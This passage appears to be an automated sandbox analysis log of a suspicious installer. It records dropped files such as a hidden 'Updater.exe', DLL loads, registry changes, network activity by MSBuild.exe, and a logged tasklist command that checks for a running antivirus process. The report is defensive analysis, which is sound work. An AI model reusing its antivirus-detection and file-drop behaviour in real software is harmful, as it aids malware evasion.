Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 6172760 > 1048576

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source:	Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source:	Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_00B3310D

Source: file.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.exe	Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598

Source: file.exe	Static PE information: section name: .didata
Source: file.tmp.0.dr	Static PE information: section name: .didata
Source: file.tmp.2.dr	Static PE information: section name: .didata
Source: is-E0D1D.tmp.3.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B41046 push ecx; ret	35_2_00B41059
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A165 push 0140A191h; ret	35_2_0140A189
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A12D push 0140A159h; ret	35_2_0140A151
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013FA149 push 013FA175h; ret	35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013FA141 push 013FA175h; ret	35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A1A3 push 0140A1D1h; ret	35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A1A5 push 0140A1D1h; ret	35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01402089 push ecx; mov dword ptr [esp], ecx	35_2_0140208E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013FA0C9 push 013FA138h; ret	35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013FA0C7 push 013FA138h; ret	35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409344 push 01409388h; ret	35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409345 push 01409388h; ret	35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01400333 push 014003C9h; ret	35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014043F3 push 01404421h; ret	35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014043F5 push 01404421h; ret	35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140039D push 014003C9h; ret	35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014043B3 push 014043E1h; ret	35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014043B5 push 014043E1h; ret	35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01400211 push 01400287h; ret	35_2_0140027F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014092ED push 01409321h; ret	35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014092F5 push 01409321h; ret	35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01400289 push 01400331h; ret	35_2_01400329
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F3555 push 013F35A6h; ret	35_2_013F359E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01400400 push 0140044Eh; ret	35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01400401 push 0140044Eh; ret	35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F5479 push ecx; mov dword ptr [esp], eax	35_2_013F547A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A48B push 0140A4B9h; ret	35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_0140A48D push 0140A4B9h; ret	35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_014004B9 push 014004E5h; ret	35_2_014004DD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409774 push 014097B8h; ret	35_2_014097B0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409775 push 014097B8h; ret	35_2_014097B0

Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00BB2558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		35_2_00BB2558
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B35D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		35_2_00B35D03

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
